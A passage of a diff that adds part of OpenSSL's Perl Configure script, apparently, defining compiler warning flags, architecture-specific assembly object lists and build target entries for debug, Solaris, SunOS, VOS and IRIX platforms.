+my $clang_disabled_warnings = "-Wno-language-extension-token -Wno-extended-offsetof -Wno-padded -Wno-shorten-64-to-32 -Wno-format-nonliteral -Wno-missing-noreturn -Wno-unused-parameter -Wno-sign-conversion -Wno-unreachable-code -Wno-conversion -Wno-documentation -Wno-missing-variable-declarations -Wno-cast-align -Wno-incompatible-pointer-types-discards-qualifiers -Wno-missing-variable-declarations -Wno-missing-field-initializers -Wno-unused-macros -Wno-disabled-macro-expansion -Wno-conditional-uninitialized -Wno-switch-enum";
+
+my $strict_warnings = 0;
+
+my $x86_gcc_des="DES_PTR DES_RISC1 DES_UNROLL";
+
+# MD2_CHAR slags pentium pros
+my $x86_gcc_opts="RC4_INDEX MD2_INT";
+
+# MODIFY THESE PARAMETERS IF YOU ARE GOING TO USE THE 'util/speed.sh SCRIPT
+# Don't worry about these normally
+
+my $tcc="cc";
+my $tflags="-fast -Xa";
+my $tbn_mul="";
+my $tlib="-lnsl -lsocket";
+#$bits1="SIXTEEN_BIT ";
+#$bits2="THIRTY_TWO_BIT ";
+my $bits1="THIRTY_TWO_BIT ";
+my $bits2="SIXTY_FOUR_BIT ";
+
+my $x86_asm="x86cpuid.o:bn-586.o co-586.o x86-mont.o x86-gf2m.o::des-586.o crypt586.o:aes-586.o vpaes-x86.o aesni-x86.o:bf-586.o:md5-586.o:sha1-586.o sha256-586.o sha512-586.o:cast-586.o:rc4-586.o:rmd-586.o:rc5-586.o:wp_block.o wp-mmx.o:cmll-x86.o:ghash-x86.o:";
+
+my $x86_elf_asm="$x86_asm:elf";
+
+my $x86_64_asm="x86_64cpuid.o:x86_64-gcc.o x86_64-mont.o x86_64-mont5.o x86_64-gf2m.o rsaz_exp.o rsaz-x86_64.o rsaz-avx2.o:ecp_nistz256.o ecp_nistz256-x86_64.o::aes-x86_64.o vpaes-x86_64.o bsaes-x86_64.o aesni-x86_64.o aesni-sha1-x86_64.o aesni-sha256-x86_64.o aesni-mb-x86_64.o::md5-x86_64.o:sha1-x86_64.o sha256-x86_64.o sha512-x86_64.o sha1-mb-x86_64.o sha256-mb-x86_64.o::rc4-x86_64.o rc4-md5-x86_64.o:::wp-x86_64.o:cmll-x86_64.o cmll_misc.o:ghash-x86_64.o aesni-gcm-x86_64.o:";
+my $ia64_asm="ia64cpuid.o:bn-ia64.o ia64-mont.o:::aes_core.o aes_cbc.o aes-ia64.o::md5-ia64.o:sha1-ia64.o sha256-ia64.o sha512-ia64.o::rc4-ia64.o rc4_skey.o:::::ghash-ia64.o::void";
+my $sparcv9_asm="sparcv9cap.o sparccpuid.o:bn-sparcv9.o sparcv9-mont.o sparcv9a-mont.o vis3-mont.o sparct4-mont.o sparcv9-gf2m.o::des_enc-sparc.o fcrypt_b.o dest4-sparcv9.o:aes_core.o aes_cbc.o aes-sparcv9.o aest4-sparcv9.o::md5-sparcv9.o:sha1-sparcv9.o sha256-sparcv9.o sha512-sparcv9.o::::::camellia.o cmll_misc.o cmll_cbc.o cmllt4-sparcv9.o:ghash-sparcv9.o::void";
+my $sparcv8_asm=":sparcv8.o::des_enc-sparc.o fcrypt_b.o:::::::::::::void";
+my $alpha_asm="alphacpuid.o:bn_asm.o alpha-mont.o::::::sha1-alpha.o:::::::ghash-alpha.o::void";
+my $mips64_asm=":bn-mips.o mips-mont.o:::aes_cbc.o aes-mips.o:::sha1-mips.o sha256-mips.o sha512-mips.o::::::::";
+my $mips32_asm=$mips64_asm; $mips32_asm =~ s/\s*sha512\-mips\.o//;
+my $s390x_asm="s390xcap.o s390xcpuid.o:bn-s390x.o s390x-mont.o s390x-gf2m.o:::aes-s390x.o aes-ctr.o aes-xts.o:::sha1-s390x.o sha256-s390x.o sha512-s390x.o::rc4-s390x.o:::::ghash-s390x.o:";
+my $armv4_asm="armcap.o armv4cpuid.o:bn_asm.o armv4-mont.o armv4-gf2m.o:::aes_cbc.o aes-armv4.o bsaes-armv7.o aesv8-armx.o:::sha1-armv4-large.o sha256-armv4.o sha512-armv4.o:::::::ghash-armv4.o ghashv8-armx.o::void";
+my $aarch64_asm="armcap.o arm64cpuid.o mem_clr.o::::aes_core.o aes_cbc.o aesv8-armx.o:::sha1-armv8.o sha256-armv8.o sha512-armv8.o:::::::ghashv8-armx.o:";
+my $parisc11_asm="pariscid.o:bn_asm.o parisc-mont.o:::aes_core.o aes_cbc.o aes-parisc.o:::sha1-parisc.o sha256-parisc.o sha512-parisc.o::rc4-parisc.o:::::ghash-parisc.o::32";
+my $parisc20_asm="pariscid.o:pa-risc2W.o parisc-mont.o:::aes_core.o aes_cbc.o aes-parisc.o:::sha1-parisc.o sha256-parisc.o sha512-parisc.o::rc4-parisc.o:::::ghash-parisc.o::64";
+my $ppc64_asm="ppccpuid.o ppccap.o:bn-ppc.o ppc-mont.o ppc64-mont.o:::aes_core.o aes_cbc.o aes-ppc.o vpaes-ppc.o aesp8-ppc.o:::sha1-ppc.o sha256-ppc.o sha512-ppc.o sha256p8-ppc.o sha512p8-ppc.o:::::::ghashp8-ppc.o:";
+my $ppc32_asm=$ppc64_asm;
+my $no_asm="::::::::::::::::void";
+
+# As for $BSDthreads. Idea is to maintain "collective" set of flags,
+# which would cover all BSD flavors. -pthread applies to them all, 
+# but is treated differently. OpenBSD expands is as -D_POSIX_THREAD
+# -lc_r, which is sufficient. FreeBSD 4.x expands it as -lc_r,
+# which has to be accompanied by explicit -D_THREAD_SAFE and
+# sometimes -D_REENTRANT. FreeBSD 5.x expands it as -lc_r, which
+# seems to be sufficient?
+my $BSDthreads="-pthread -D_THREAD_SAFE -D_REENTRANT";
+
+#config-string	$cc : $cflags : $unistd : $thread_cflag : $sys_id : $lflags : $bn_ops : $cpuid_obj : $bn_obj : $ec_obj : $des_obj : $aes_obj : $bf_obj : $md5_obj : $sha1_obj : $cast_obj : $rc4_obj : $rmd160_obj : $rc5_obj : $wp_obj : $cmll_obj : $modes_obj : $engines_obj : $dso_scheme : $shared_target : $shared_cflag : $shared_ldflag : $shared_extension : $ranlib : $arflags : $multilib
+
+my %table=(
+# File 'TABLE' (created by 'make TABLE') contains the data from this list,
+# formatted for better readability.
+
+
+#"b",		"${tcc}:${tflags}::${tlib}:${bits1}:${tbn_mul}::",
+#"bl-4c-2c",	"${tcc}:${tflags}::${tlib}:${bits1}BN_LLONG RC4_CHAR MD2_CHAR:${tbn_mul}::",
+#"bl-4c-ri",	"${tcc}:${tflags}::${tlib}:${bits1}BN_LLONG RC4_CHAR RC4_INDEX:${tbn_mul}::",
+#"b2-is-ri-dp",	"${tcc}:${tflags}::${tlib}:${bits2}IDEA_SHORT RC4_INDEX DES_PTR:${tbn_mul}::",
+
+# Our development configs
+"purify",	"purify gcc:-g -DPURIFY -Wall::(unknown)::-lsocket -lnsl::::",
+"debug",	"gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG -DOPENSSL_NO_ASM -ggdb -g2 -Wformat -Wshadow -Wmissing-prototypes -Wmissing-declarations -Werror::(unknown)::-lefence::::",
+"debug-ben",	"gcc:$gcc_devteam_warn -DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG -DDEBUG_SAFESTACK -O2 -pipe::(unknown):::::",
+"debug-ben-openbsd","gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG -DPEDANTIC -DDEBUG_SAFESTACK -DOPENSSL_OPENBSD_DEV_CRYPTO -DOPENSSL_NO_ASM -O2 -pedantic -Wall -Wshadow -Werror -pipe::(unknown)::::",
+"debug-ben-openbsd-debug","gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG -DPEDANTIC -DDEBUG_SAFESTACK -DOPENSSL_OPENBSD_DEV_CRYPTO -DOPENSSL_NO_ASM -g3 -O2 -pedantic -Wall -Wshadow -Werror -pipe::(unknown)::::",
+"debug-ben-debug",	"gcc44:$gcc_devteam_warn -DBN_DEBUG -DCONF_DEBUG -DDEBUG_SAFESTACK -DDEBUG_UNUSED -g3 -O2 -pipe::(unknown)::::::",
+"debug-ben-debug-64",	"gcc:$gcc_devteam_warn -Wno-error=overlength-strings -DBN_DEBUG -DCONF_DEBUG -DDEBUG_SAFESTACK -DDEBUG_UNUSED -g3 -O3 -pipe::${BSDthreads}:::SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:bsd-gcc-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-ben-macos",	"cc:$gcc_devteam_warn -arch i386 -DBN_DEBUG -DCONF_DEBUG -DDEBUG_SAFESTACK -DDEBUG_UNUSED -DOPENSSL_THREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -O3 -DL_ENDIAN -g3 -pipe::(unknown)::-Wl,-search_paths_first::::",
+"debug-ben-macos-gcc46",	"gcc-mp-4.6:$gcc_devteam_warn -Wconversion -DBN_DEBUG -DCONF_DEBUG -DDEBUG_SAFESTACK -DDEBUG_UNUSED -DOPENSSL_THREADS -D_REENTRANT -DDSO_DLFCN -DHAVE_DLFCN_H -O3 -DL_ENDIAN -g3 -pipe::(unknown)::::::",
+"debug-ben-darwin64","cc:$gcc_devteam_warn -g -Wno-language-extension-token -Wno-extended-offsetof -arch x86_64 -O3 -DL_ENDIAN -Wall::-D_REENTRANT:MACOSX:-Wl,-search_paths_first%:SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL:".eval{my $asm=$x86_64_asm;$asm=~s/rc4\-[^:]+//;$asm}.":macosx:dlfcn:darwin-shared:-fPIC -fno-common:-arch x86_64 -dynamiclib:.\$(SHLIB_MAJOR).\$(SHLIB_MINOR).dylib",
+"debug-ben-debug-64-clang",	"clang:$gcc_devteam_warn -Wno-error=overlength-strings -Wno-error=extended-offsetof -Qunused-arguments -DBN_DEBUG -DCONF_DEBUG -DDEBUG_SAFESTACK -DDEBUG_UNUSED -g3 -O3 -pipe::${BSDthreads}:::SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:bsd-gcc-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-ben-no-opt",	"gcc: -Wall -Wmissing-prototypes -Wstrict-prototypes -Wmissing-declarations -DDEBUG_SAFESTACK -DCRYPTO_MDEBUG -Werror -DL_ENDIAN -DTERMIOS -Wall -g3::(unknown)::::::",
+"debug-ben-strict",	"gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG -DCONST_STRICT -O2 -Wall -Wshadow -Werror -Wpointer-arith -Wcast-qual -Wwrite-strings -pipe::(unknown)::::::",
+"debug-rse","cc:-DTERMIOS -DL_ENDIAN -pipe -O -g -ggdb3 -Wall::(unknown):::BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}",
+"debug-bodo",	"gcc:$gcc_devteam_warn -Wno-error=overlength-strings -DBN_DEBUG -DBN_DEBUG_RAND -DCONF_DEBUG -DBIO_PAIR_DEBUG -m64 -DL_ENDIAN -DTERMIOS -g -DMD32_REG_T=int::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:linux-shared:-fPIC:-m64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+"debug-steve64", "gcc:$gcc_devteam_warn -m64 -DL_ENDIAN -DTERMIOS -DCONF_DEBUG -DDEBUG_SAFESTACK -Wno-overlength-strings -g::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:linux-shared:-fPIC:-m64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-steve32", "gcc:$gcc_devteam_warn -m32 -DL_ENDIAN -DCONF_DEBUG -DDEBUG_SAFESTACK -Wno-overlength-strings -g -pipe::-D_REENTRANT::-rdynamic -ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:linux-shared:-fPIC:-m32:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-steve-opt", "gcc:$gcc_devteam_warn -m64 -O3 -DL_ENDIAN -DTERMIOS -DCONF_DEBUG -DDEBUG_SAFESTACK -g::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:linux-shared:-fPIC:-m64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-levitte-linux-elf","gcc:-DLEVITTE_DEBUG -DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DCRYPTO_MDEBUG -DL_ENDIAN -ggdb -g3 -Wall::-D_REENTRANT::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-levitte-linux-noasm","gcc:-DLEVITTE_DEBUG -DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DCRYPTO_MDEBUG -DOPENSSL_NO_ASM -DL_ENDIAN -ggdb -g3 -Wall::-D_REENTRANT::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${no_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-levitte-linux-elf-extreme","gcc:-DLEVITTE_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_DEBUG -DBN_DEBUG_RAND -DCRYPTO_MDEBUG -DENGINE_CONF_DEBUG -DL_ENDIAN -DTERMIOS -DPEDANTIC -ggdb -g3 -pedantic -ansi -Wall -W -Wundef -Wshadow -Wcast-align -Wstrict-prototypes -Wmissing-prototypes -Wno-long-long -Wundef -Wconversion -pipe::-D_REENTRANT::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-levitte-linux-noasm-extreme","gcc:-DLEVITTE_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_DEBUG -DBN_DEBUG_RAND -DCRYPTO_MDEBUG -DENGINE_CONF_DEBUG -DOPENSSL_NO_ASM -DL_ENDIAN -DTERMIOS -DPEDANTIC -ggdb -g3 -pedantic -ansi -Wall -W -Wundef -Wshadow -Wcast-align -Wstrict-prototypes -Wmissing-prototypes -Wno-long-long -Wundef -Wconversion -pipe::-D_REENTRANT::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${no_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-geoff32","gcc:-DBN_DEBUG -DBN_DEBUG_RAND -DBN_STRICT -DPURIFY -DOPENSSL_NO_DEPRECATED -DOPENSSL_NO_ASM -DOPENSSL_NO_INLINE_ASM -DL_ENDIAN -DTERMIOS -DPEDANTIC -O1 -ggdb2 -Wall -Werror -Wundef -pedantic -Wshadow -Wpointer-arith -Wbad-function-cast -Wcast-align -Wsign-compare -Wmissing-prototypes -Wmissing-declarations -Wno-long-long::-D_REENTRANT::-ldl:BN_LLONG:${no_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-geoff64","gcc:-DBN_DEBUG -DBN_DEBUG_RAND -DBN_STRICT -DPURIFY -DOPENSSL_NO_DEPRECATED -DOPENSSL_NO_ASM -DOPENSSL_NO_INLINE_ASM -DL_ENDIAN -DTERMIOS -DPEDANTIC -O1 -ggdb2 -Wall -Werror -Wundef -pedantic -Wshadow -Wpointer-arith -Wbad-function-cast -Wcast-align -Wsign-compare -Wmissing-prototypes -Wmissing-declarations -Wno-long-long::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${no_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-linux-pentium","gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG -DL_ENDIAN -DTERMIOS -g -mcpu=pentium -Wall::-D_REENTRANT::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn",
+"debug-linux-ppro","gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG -DL_ENDIAN -DTERMIOS -g -mcpu=pentiumpro -Wall::-D_REENTRANT::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn",
+"debug-linux-elf","gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG -DL_ENDIAN -DTERMIOS -g -march=i486 -Wall::-D_REENTRANT::-lefence -ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-linux-elf-noefence","gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG -DL_ENDIAN -DTERMIOS -g -march=i486 -Wall::-D_REENTRANT::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-linux-ia32-aes", "gcc:-DAES_EXPERIMENTAL -DL_ENDIAN -DTERMIOS -O3 -fomit-frame-pointer -Wall::-D_REENTRANT::-ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:x86cpuid.o:bn-586.o co-586.o x86-mont.o::des-586.o crypt586.o:aes_x86core.o aes_cbc.o aesni-x86.o:bf-586.o:md5-586.o:sha1-586.o sha256-586.o sha512-586.o:cast-586.o:rc4-586.o:rmd-586.o:rc5-586.o:wp_block.o wp-mmx.o::ghash-x86.o::elf:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-linux-generic32","gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DCRYPTO_MDEBUG -DTERMIOS -g -Wall::-D_REENTRANT::-ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${no_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-linux-generic64","gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DCRYPTO_MDEBUG -DTERMIOS -g -Wall::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHAR RC4_CHUNK DES_INT DES_UNROLL BF_PTR:${no_asm}:dlfcn:linux-shared:-fPIC::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-linux-x86_64","gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DCRYPTO_MDEBUG -m64 -DL_ENDIAN -DTERMIOS -g -Wall::-D_REENTRANT::-ldl:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:linux-shared:-fPIC:-m64:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::64",
+"dist",		"cc:-O::(unknown)::::::",
+
+# Basic configs that should work on any (32 and less bit) box
+"gcc",		"gcc:-O3::(unknown):::BN_LLONG:::",
+"cc",		"cc:-O::(unknown)::::::",
+
+####VOS Configurations
+"vos-gcc","gcc:-O3 -Wall -DOPENSSL_SYSNAME_VOS -D_POSIX_C_SOURCE=200112L -D_BSD -D_VOS_EXTENDED_NAMES -DB_ENDIAN::(unknown):VOS:-Wl,-map:BN_LLONG:${no_asm}:::::.so:",
+"debug-vos-gcc","gcc:-O0 -g -Wall -DOPENSSL_SYSNAME_VOS -D_POSIX_C_SOURCE=200112L -D_BSD -D_VOS_EXTENDED_NAMES -DB_ENDIAN -DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DCRYPTO_MDEBUG::(unknown):VOS:-Wl,-map:BN_LLONG:${no_asm}:::::.so:",
+
+#### Solaris x86 with GNU C setups
+# -DOPENSSL_NO_INLINE_ASM switches off inline assembler. We have to do it
+# here because whenever GNU C instantiates an assembler template it
+# surrounds it with #APP #NO_APP comment pair which (at least Solaris
+# 7_x86) /usr/ccs/bin/as fails to assemble with "Illegal mnemonic"
+# error message.
+"solaris-x86-gcc","gcc:-O3 -fomit-frame-pointer -march=pentium -Wall -DL_ENDIAN -DOPENSSL_NO_INLINE_ASM::-D_REENTRANT::-lsocket -lnsl -ldl:BN_LLONG ${x86_gcc_des} ${x86_gcc_opts}:${x86_elf_asm}:dlfcn:solaris-shared:-fPIC:-shared:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+# -shared -static-libgcc might appear controversial, but modules taken
+# from static libgcc do not have relocations and linking them into our
+# shared objects doesn't have any negative side-effects. On the contrary,
+# doing so makes it possible to use gcc shared build with Sun C. Given
+# that gcc generates faster code [thanks to inline assembler], I would
+# actually recommend to consider using gcc shared build even with vendor
+# compiler:-)
+#						<appro@fy.chalmers.se>
+"solaris64-x86_64-gcc","gcc:-m64 -O3 -Wall -DL_ENDIAN::-D_REENTRANT::-lsocket -lnsl -ldl:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:solaris-shared:-fPIC:-m64 -shared -static-libgcc:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/64",
+ 
+#### Solaris x86 with Sun C setups
+"solaris-x86-cc","cc:-fast -xarch=generic -O -Xa::-D_REENTRANT::-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_PTR DES_UNROLL BF_PTR:${no_asm}:dlfcn:solaris-shared:-KPIC:-G -dy -z text:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"solaris64-x86_64-cc","cc:-fast -xarch=amd64 -xstrconst -Xa -DL_ENDIAN::-D_REENTRANT::-lsocket -lnsl -ldl:SIXTY_FOUR_BIT_LONG RC4_CHUNK DES_INT DES_UNROLL:${x86_64_asm}:elf:dlfcn:solaris-shared:-KPIC:-xarch=amd64 -G -dy -z text:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/64",
+
+#### SPARC Solaris with GNU C setups
+"solaris-sparcv7-gcc","gcc:-O3 -fomit-frame-pointer -Wall -DB_ENDIAN -DBN_DIV2W::-D_REENTRANT::-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${no_asm}:dlfcn:solaris-shared:-fPIC:-shared:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"solaris-sparcv8-gcc","gcc:-mv8 -O3 -fomit-frame-pointer -Wall -DB_ENDIAN -DBN_DIV2W::-D_REENTRANT::-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${sparcv8_asm}:dlfcn:solaris-shared:-fPIC:-shared:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+# -m32 should be safe to add as long as driver recognizes -mcpu=ultrasparc
+"solaris-sparcv9-gcc","gcc:-m32 -mcpu=ultrasparc -O3 -fomit-frame-pointer -Wall -DB_ENDIAN -DBN_DIV2W::-D_REENTRANT:ULTRASPARC:-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${sparcv9_asm}:dlfcn:solaris-shared:-fPIC:-shared:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"solaris64-sparcv9-gcc","gcc:-m64 -mcpu=ultrasparc -O3 -Wall -DB_ENDIAN::-D_REENTRANT:ULTRASPARC:-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_INT DES_PTR DES_RISC1 DES_UNROLL BF_PTR:${sparcv9_asm}:dlfcn:solaris-shared:-fPIC:-m64 -shared:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/64",
+####
+"debug-solaris-sparcv8-gcc","gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG_ALL -O -g -mv8 -Wall -DB_ENDIAN::-D_REENTRANT::-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${sparcv8_asm}:dlfcn:solaris-shared:-fPIC:-shared:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-solaris-sparcv9-gcc","gcc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG_ALL -DPEDANTIC -O -g -mcpu=ultrasparc -pedantic -ansi -Wall -Wshadow -Wno-long-long -D__EXTENSIONS__ -DB_ENDIAN -DBN_DIV2W::-D_REENTRANT:ULTRASPARC:-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL BF_PTR:${sparcv9_asm}:dlfcn:solaris-shared:-fPIC:-shared:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+
+#### SPARC Solaris with Sun C setups
+# SC4.0 doesn't pass 'make test', upgrade to SC5.0 or SC4.2.
+# SC4.2 is ok, better than gcc even on bn as long as you tell it -xarch=v8
+# SC5.0 note: Compiler common patch 107357-01 or later is required!
+"solaris-sparcv7-cc","cc:-xO5 -xstrconst -xdepend -Xa -DB_ENDIAN -DBN_DIV2W::-D_REENTRANT::-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_PTR DES_RISC1 DES_UNROLL BF_PTR:${no_asm}:dlfcn:solaris-shared:-KPIC:-G -dy -z text:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"solaris-sparcv8-cc","cc:-xarch=v8 -xO5 -xstrconst -xdepend -Xa -DB_ENDIAN -DBN_DIV2W::-D_REENTRANT::-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_PTR DES_RISC1 DES_UNROLL BF_PTR:${sparcv8_asm}:dlfcn:solaris-shared:-KPIC:-G -dy -z text:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"solaris-sparcv9-cc","cc:-xtarget=ultra -xarch=v8plus -xO5 -xstrconst -xdepend -Xa -DB_ENDIAN -DBN_DIV2W::-D_REENTRANT:ULTRASPARC:-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK_LL DES_PTR DES_RISC1 DES_UNROLL BF_PTR:${sparcv9_asm}:dlfcn:solaris-shared:-KPIC:-G -dy -z text:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"solaris64-sparcv9-cc","cc:-xtarget=ultra -xarch=v9 -xO5 -xstrconst -xdepend -Xa -DB_ENDIAN::-D_REENTRANT:ULTRASPARC:-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_INT DES_PTR DES_RISC1 DES_UNROLL BF_PTR:${sparcv9_asm}:dlfcn:solaris-shared:-KPIC:-xarch=v9 -G -dy -z text:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR):::/64",
+####
+"debug-solaris-sparcv8-cc","cc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG_ALL -xarch=v8 -g -O -xstrconst -Xa -DB_ENDIAN -DBN_DIV2W::-D_REENTRANT::-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK DES_PTR DES_RISC1 DES_UNROLL BF_PTR:${sparcv8_asm}:dlfcn:solaris-shared:-KPIC:-G -dy -z text:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
+"debug-solaris-sparcv9-cc","cc:-DBN_DEBUG -DREF_CHECK -DCONF_DEBUG -DBN_CTX_DEBUG -DCRYPTO_MDEBUG_ALL -xtarget=ultra -xarch=v8plus -g -O -xstrconst -Xa -DB_ENDIAN -DBN_DIV2W::-D_REENTRANT:ULTRASPARC:-lsocket -lnsl -ldl:BN_LLONG RC4_CHAR RC4_CHUNK_LL DES_PTR DES_RISC1 DES_UNROLL BF_PTR:${sparcv9_asm}:dlfcn:solaris-shared:-KPIC:-G -dy -z text:.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)", 
+
+#### SunOS configs, assuming sparc for the gcc one.
+#"sunos-cc", "cc:-O4 -DNOPROTO -DNOCONST::(unknown):SUNOS::DES_UNROLL:${no_asm}::",
+"sunos-gcc","gcc:-O3 -mv8 -Dssize_t=int::(unknown):SUNOS::BN_LLONG RC4_CHAR RC4_CHUNK DES_UNROLL DES_PTR DES_RISC1:${no_asm}::",
+
+#### IRIX 5.x configs
+# -mips2 flag is added by ./config when appropriate.
+"irix-gcc","gcc:-O3 -DTERMIOS -DB_ENDIAN::(unknown):::BN_LLONG MD2_CHAR RC4_INDEX RC4_CHAR RC4_CHUNK DES_UNROLL DES_RISC2 DES_PTR BF_PTR:${mips32_asm}:o32:dlfcn:irix-shared:::.so.\$(SHLIB_MAJOR).\$(SHLIB_MINOR)",
